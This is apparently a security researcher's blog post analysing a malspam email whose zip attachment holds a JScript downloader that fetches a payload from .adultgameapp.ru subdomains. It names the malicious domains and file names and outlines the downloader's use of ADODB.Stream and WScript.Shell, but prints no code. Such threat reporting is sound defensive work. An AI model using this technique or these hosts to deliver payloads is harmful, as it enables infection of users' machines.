Sub-domains at .adultgameapp.ru and proadultgame.ru
I received some malspam on 9/2/16 entitled “Take easy steps on the ladder of happiness”. The email address of the sender was firstname.lastname@example.org and it was supposedly from a “Bettie K. Letbetter”:
Allowing pictures to be displayed in the email shows sexually explicit content. Clicking on the link “Lecherous Bettie” opens up a new tab in the browser and points to sub-domains like bapuortvdedssdtu.datingtf.ru (302), rqfkehjltutiitjk.datingtf.ru and ihwbvyacklkzzkab.datingtf.ru. This was the webpage presented to me:
This looks like some kind of spam page. The interesting portion of this email wasn’t the fake Russian dating website but the attached “IM 77_ .zip” shown above. The criminals are trying to entice users to open up the “pics” contained is the .zip for more sexually explicit photos.
Saving the file and opening it up shows that the .zip folder contains the file “Cissy.js”:
Executing the JScript file causes the host to make a single GET request for “/js/boxun4.bin” via sub-domains on .adultgameapp.ru:
Each GET requests shown above represents me trying to get infected by multiple executions of the JScript file. Unfortunately, all I was getting back from the server was the 304 (Not Modified) status code.
Each time the JScript file was executed there was a corresponding file created in %APPDATA%:
Looking at Task Manager we can also see the process “TempradFF69C.tmp *32” attempting to run something called “SilverCare”:
However, the program kept getting the error “SilverCare has stopped working,” thus we can also see “WerFault.exe *32” (Windows Problem Reporting) in the Task Manager:
Now for a look at the JScript file responsible for the GET requests for boxun4.bin.
My coworker quickly identified that the randomly named strings in the code were given specific values. See all the strings highlighted in red:
These values would be called on later and then added together. Example shown below:
This portion of the code was also fully de-obfuscated by my coworker but won’t be posted on this blog for security reasons:
After fully examinating of the JScript file we can see that it is constructing an ADODB.Stream and WScript.Shell to create the GET requests to the distribution sites.
Searching via Google for the file “boxun4.bin” returns tons of Hybrid-Analysis and Malwr’s reports for similarly named .zip files and JScript files. The threat names don’t really give me any clues as to the identity of the malware.
If anybody has any clues as to what this malware is you can contact me on Twitter: @Oddly_Normal